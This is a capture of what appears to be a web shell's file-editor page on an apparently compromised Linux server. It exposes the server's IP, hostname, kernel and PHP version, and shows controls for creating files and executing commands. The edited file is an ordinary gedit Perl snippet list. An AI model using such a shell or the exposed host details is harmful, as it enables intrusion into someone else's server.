One Hat Cyber Team
Your IP :
216.73.216.80
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
backup
/
dad
/
usr
/
share
/
gedit
/
plugins
/
snippets
/
Edit File:
perl.xml
<?xml version="1.0" encoding="UTF-8"?> <snippets language="Perl"> <snippet id="perl"> <text><![CDATA[#!/usr/bin/perl $0]]></text> <tag>perl</tag> <description>#!/usr/bin/perl</description> </snippet> <snippet id="ife"> <text><![CDATA[if ($1) { ${2:# body...} } else { ${3:# else...} } ]]></text> <description>Conditional if..else</description> <tag>ife</tag> </snippet> <snippet id="ifee"> <text><![CDATA[if ($1) { ${2:# body...} } elsif ($3) { ${4:# elsif...} } else { ${5:# else...} } ]]></text> <description>Conditional if..elsif..else</description> <tag>ifee</tag> </snippet> <snippet id="xunless"> <text><![CDATA[${1:expression} unless ${2:condition}; ]]></text> <description>Conditional one-line</description> <tag>xunless</tag> </snippet> <snippet id="xif"> <text><![CDATA[${1:expression} if ${2:condition}; ]]></text> <description>Conditional one-line</description> <tag>xif</tag> </snippet> <snippet id="eval"> <text><![CDATA[eval { ${1:# do something risky...} }; if ($@) { ${2:# handle failure...} } ]]></text> <description>Try/Except</description> <tag>eval</tag> </snippet> <snippet id="fore"> <text><![CDATA[foreach ${1:my $${2:x} }(@${3:array}) { ${4:# body...} } ]]></text> <description>Loop</description> <tag>fore</tag> </snippet> <snippet id="for"> <text><![CDATA[for (my $${1:var} = 0; $$1 < ${2:expression}; $$1++) { ${3:# body...} } ]]></text> <description>Loop</description> <tag>for</tag> </snippet> <snippet id="sub"> <text><![CDATA[sub ${1:function_name} { ${2:# body...} } ]]></text> <description>Function</description> <tag>sub</tag> </snippet> <snippet id="hashpointer"> <text><![CDATA[ => ]]></text> <accelerator><![CDATA[<Shift><Alt>l]]></accelerator> <description>hash pointer</description> </snippet> <snippet id="if"> <text><![CDATA[if ($1) { ${2:# body...} } ]]></text> <description>Conditional</description> <tag>if</tag> </snippet> <snippet id="xfore"> <text><![CDATA[${1:expression} foreach @${2:array}; ]]></text> <description>Loop one-line</description> <tag>xfore</tag> </snippet> <snippet id="xwhile"> <text><![CDATA[${1:expression} while ${2:condition}; ]]></text> <description>Loop one-line</description> <tag>xwhile</tag> </snippet> <snippet id="slurp"> <text><![CDATA[my $${1:var}; { local $/ = undef; local *FILE; open FILE, "<${2:file}"; $$1 = <FILE>; close FILE } ]]></text> <description>Read File</description> <tag>slurp</tag> </snippet> <snippet id="unless"> <text><![CDATA[unless ($1) { ${2:# body...} } ]]></text> <description>Conditional</description> <tag>unless</tag> </snippet> <snippet id="while"> <text><![CDATA[while ($1) { ${2:# body...} } ]]></text> <description>Loop</description> <tag>while</tag> </snippet> </snippets>
Simpan